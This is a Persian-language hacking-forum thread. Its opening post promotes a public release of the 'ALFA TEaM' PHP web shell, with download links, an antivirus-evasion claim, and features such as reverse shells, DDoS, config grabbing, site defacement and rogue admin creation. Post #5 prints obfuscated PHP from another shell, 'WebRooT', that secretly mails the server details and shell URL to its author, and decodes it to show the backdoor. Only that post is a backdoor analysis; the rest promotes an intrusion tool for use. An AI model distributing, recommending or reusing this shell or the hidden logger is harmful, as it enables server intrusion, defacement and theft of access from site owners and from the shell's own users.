SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Powerful ALFA TEaM Shell [Priv8]

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Powerful ALFA TEaM Shell [Priv8]

    سلام به همه دوستان ، مستقیم برم سر اصل مطلب، ما (alfa team) چند وقت پیش به فکر نوشتن یه شل افتادیم که اونو نوشتیم و الان تصمیم به پابلیک کردنش گرفتنش کردیم ، شل کامل متد پسته ، هیچ آنتی ویروسی هم نمیشناستش ، رو خیلی از سرور ها شل ها جواب نمیدادن آپلودش کردیم جواب داد ، امیدوارم خوشتون بیاد
    File Name: solevisible-shell.php
    File Size: 198 KB
    Scan Date: 2014/03/26
    Scan Result: 0/51
    https://www.virustotal.com/en/file/c1f67e7cda6620f052c73afda53a0d076981720ec2bd134997 d6a6a2a49c5f06/analysis/1395840285

    لینک دای دانلود این شلر

      https://github.com/solevisible/ALFA-SHELL
    http://pastebin.com/ivaCUZLr
    http://tny.cz/06d0746e
    http://paste2.org/4Gf8Awmz
    http://chopapp.com/#wwt22gz2
    http://uploadbaz.com/di418iz5m61q
    http://uploadboy.com/7xkdhk0fw26t.html
    قابلیت های شل : [align=left]SQL Connection
    De/Encoder
    BackConnect [-PHP][Perl][Python]
    ZONE-H Mass Poster
    DDOSer
    Bypassing htaccess [apache][LiteSpeed]
    Bypassing Read-Passwd/Users
    Bypassing Get-User/Domains
    CGI SHELL [Perl][Python]
    CMD SHELL
    MD5 Cracker
    Port Scanner
    Open BaseDir
    Anonymous Emailer
    Pro File/Dir Zipper
    Auto Defecer [vBulletin][MyBB]
    Add New Admin User [WordPress][Joomla][ET CHAT][vBulletin][phpBB][whmcs][MyBB][Php Nuke]
    vBulletin Shell Injector
    PHP2XML Creator [For vBulletin]
    CloudFlare ByPasser [IP Grabber]
    WHMCS [Shell Injector][Decoder]
    Symlink [Domains][Config Grabber][Dir/File]
    Whole Symlink [Cpanel][Direct-Admin]
    Config Fucker && Hidden Shell    [/align] 
    برچسب ها: هیچ یک
  • #2
    RE: Powerful ALFA TEaM Shell [Priv8]

    با سلام
    کارتون قابل تحسین هست ولی به نظر بنده اگر دیکد شده این شلر رو هم قرار میدادید بیشتر مورد اعتماد قرار میگرفت.
    موفق باشید
     
    [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

    همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
     

    نظر

    • #3
      RE: Powerful ALFA TEaM Shell [Priv8]

      متاسفانه وقتی دیکد شده شل موجود نیست هر کسی اعتماد نمیکنه .

      به دلیل اینکه شاید دسترسی لو بره ، ایمیل بشه و ...
      [align=center][/align]

      نظر

      • #4
        RE: Powerful ALFA TEaM Shell [Priv8]

        درود
        من به شما حق میدوم دوستان ، ولی اینکدش کردیم به خاطر رعایت قانون کپی رایت ، خودتونم که در جریان هستین تو ایران این قانون زیاد رعایت نمیشه مخصوصا توسط بعضی از جوجه ها ، توهین به شماها نمیکنم ، واسه همین رو اینکدش زیاد وقت نذاشتیم و راحت دیکد میشه ، دیکد میشه ولی فکر نکنم اون جوجه ها که گفتم بتونن دیکد کنن ، اگه غیر از اون جوجه ها دیکد کردن و استفاده کردن نوشه جونشون ، چون اونا نمیان قانون کپی رایتو زیر پا بذارن و به اسم خودشون تموم کنن شلو ، شما هم جز همون افرادی هستین که گفتم دیکد کنن قانون کپی رایتو زیر پا نمیذارن ، ولی واسه اینکه بین کسی فرق نذاریم ، همه جا اینکد شدشو گذاشتیم ، ولی من خودم قول میدم هیچ بکدوری توش نیست [img]images/smilies/Smileys/8.gif[/img]         در ضمن دوستان خیلی از شلر های معروف مثله مد اسپوت ، وب روت اینکد شدشون دسته مردمه ، یعنی اونا هم بک دور میذارن؟

        نظر

        • #5
          RE: Powerful ALFA TEaM Shell [Priv8]

          شما مطمئن هستید که بکدور ندارن اون شلرها ؟
          نمونه ای که خودتون گفتید رو مثال میزنم : وب روت - WebRooT
          لاگر این شلر به شکل زیر هستش :
          کد:
          <?php $IIIIIIIIIIII = $GLOBALS['OOO0000O0']('d2VicjAwdC5ta3RAZ21haWwuY29t');
$IIIIIIIIIIIl = $GLOBALS['OOO0000O0']('V2ViUm9vVCBMb2dnZXI=');
$IIIIIIIIIII1 = $GLOBALS['OOO0000O0']('RG9zeWEgWW9sdSA6IA==') . $_SERVER[$GLOBALS['OOO0000O0']('RE9DVU1FTlRfUk9PVA==') ] . "
";
$IIIIIIIIIII1.= $GLOBALS['OOO0000O0']('U2VydmVyIEFkbWluIDog') . $_SERVER[$GLOBALS['OOO0000O0']('U0VSVkVSX0FETUlO') ] . "
";
$IIIIIIIIIII1.= $GLOBALS['OOO0000O0']('U2VydmVyIGlzbGV0aW0gc2lzdGVtaSA6IA==') . $_SERVER[$GLOBALS['OOO0000O0']('U0VSVkVSX1NPRlRXQVJF') ] . "
";
$IIIIIIIIIII1.= $GLOBALS['OOO0000O0']('U2hlbGwgTGluayA6IGh0dHA6Ly8=') . $_SERVER[$GLOBALS['OOO0000O0']('U0VSVkVSX05BTUU=') ] . $_SERVER[$GLOBALS['OOO0000O0']('UEhQX1NFTEY=') ] . "
";
$IIIIIIIIIII1.= $GLOBALS['OOO0000O0']('QXZsYW5hbiBTaXRlIDog') . $_SERVER[$GLOBALS['OOO0000O0']('SFRUUF9IT1NU') ] . "
";
mail($IIIIIIIIIIII, $IIIIIIIIIIIl, $IIIIIIIIIII1);;
          نکته ای که جالب هستش اینه که با شروع شلر، ابتدا لاگر شروع به کار میکنه.
          خوب حالا میایم تحلیلیش میکنیم :
          ابتدا میایم میبینیم که در کدهای شلر از تابع mail استفاده شده یا نه. خب اگه استفاده شده باشه فقط برای لاگر نیست. میتونه برای سرویس ارسال کننده ی ایمیل ناشناس از طرف یک ایمیل به ایمیل دیگری هم باشه که تو شلر خودتون هم این امکان وجود داشته و بهتر از من اطلاع دارید.
          اما میایم میبینیم که داخل تابع چه متغیرهایی برای ارسال ایمیل تعریف شده. خمونطور که در کد زیر میبینید متغیرها در بالای تابع تعریف شده هستند و برای افراد تازه کار شاید کمی سخت باشه که به تحلیل اون کدها بپردازن. هوشمندی که در اینجا به کار رفته این هستش که از Base64 برای لاگ کردن اطلاعات اصلی استفاده شده. اطلاعاتی همچون ایمیلی که قرار هست اطلاعات برای لاگ بشه و... حالا بررسی می کنیم :

          1- ایمیلی که اطلاعات شل ما براش ارسال میشه :
          کد:
          d2VicjAwdC5ta3RAZ21haWwuY29t = [email protected]
          2- Subject ایمیلی که ارسال میشه :
          کد:
          RG9zeWEgWW9sdSA6IA== = WebRooT Logger
          3- دایرکتوری که شل داخلش قرار داره :
          کد:
          RE9DVU1FTlRfUk9PVA== = DOCUMENT_ROOT
          بقیش اکثراً به زبان ترکی هستش که من سر در نمیارم اما مهمترین قسمت رو براتون میزارم تا متوجه بشید :
          کد:
          U2hlbGwgTGluayA6IGh0dHA6Ly8= = Shell Link : http://
          برای همین هست که میگن هر شلر رو قبل از استفاده دیکد کنید.
          فکر می کنم تا همین اندازه کافی باشه. اگر نیست که باز هم توضیح بدم.
          موفق باشید
           
          [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

          همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
           

          نظر

          • #6
            RE: Powerful ALFA TEaM Shell [Priv8]

            60 % شل های پابلیک به همین منوال آلوده هستند ، حالا شل alfa هم باید بررسی بشه حالا که پابلیک شده .

            ببخشید اما کسی ، وقتی چیزی براش منفعت داره پابلیکش میکنه (دنیای بلک هت)

            ولی در کل تولز مفید و خوبی هست ، البته ، اگر آلوده نباشه .
            [align=center][/align]

            نظر

            • #7
              RE: Powerful ALFA TEaM Shell [Priv8]

              xpr عزیز اره اینم حرفیه ، ولی من قول میدم هیچ بکدوری توش نیست ، این کار ها لمر بازیه به شما هم حق میدم اینطوری فکر کنین ، اول قرار نبود پابلیک شه ، ولی بعضی از دوستان گفتن بهشون بدم ، بعد اگه به یکی میدادیم ، به یکی نمیدادیم ، بد میشد ، واسه همین تصمیم گرفتیم پابلیک کنیم ، اینکد کردنشم دو تا دلیل داشت ، یک اینکه انتی ویروس ها نشناسنش ، دو اینکه حق کپی رایت رعایت شه ، شما هم بیکار شدین وقت اضافه داشتین دیکدش کننین(راحت دیکد میشه ، رو اینکدش زیاد وقت نذاشتیم) مطمئن شین که بکدور یا چیز مخربی روش نیست ، دوباره تکرار میکنم به قول میدم که هیچی روش نیست ، چون اینجور شل دزدی ها کاملا لمر بازیه ، فقط وقتی مطمئن شدین ، خواهشن اینجا اعلام کنین که دگیران هم راحت استفاده کنن ، ممنون

              mojirider حق با توئه دوسته عزیز ، ما وب روتو دیکد نکرده بودیم ، ولی مد اسپوتو دیکد کردیم دیدم توش بکدوری نیست ، لطفا بیکار شدی شلر ما رو هم دیکد کن و مطمئن شو بکدوری توش نیست ، وقتی متوجه شدی توش نیست اینجا هم اعلام کن

              نکته : دلیل اینکه خودم دیکد شدشو بهتون نمیدم اینه که دوستان ناراحت نشن ، چون اگه به شما بدم ، به بقیه هم باید بدم ، ممنون

              نظر

              قبلی template بعدی
              صبر کنید ..
              X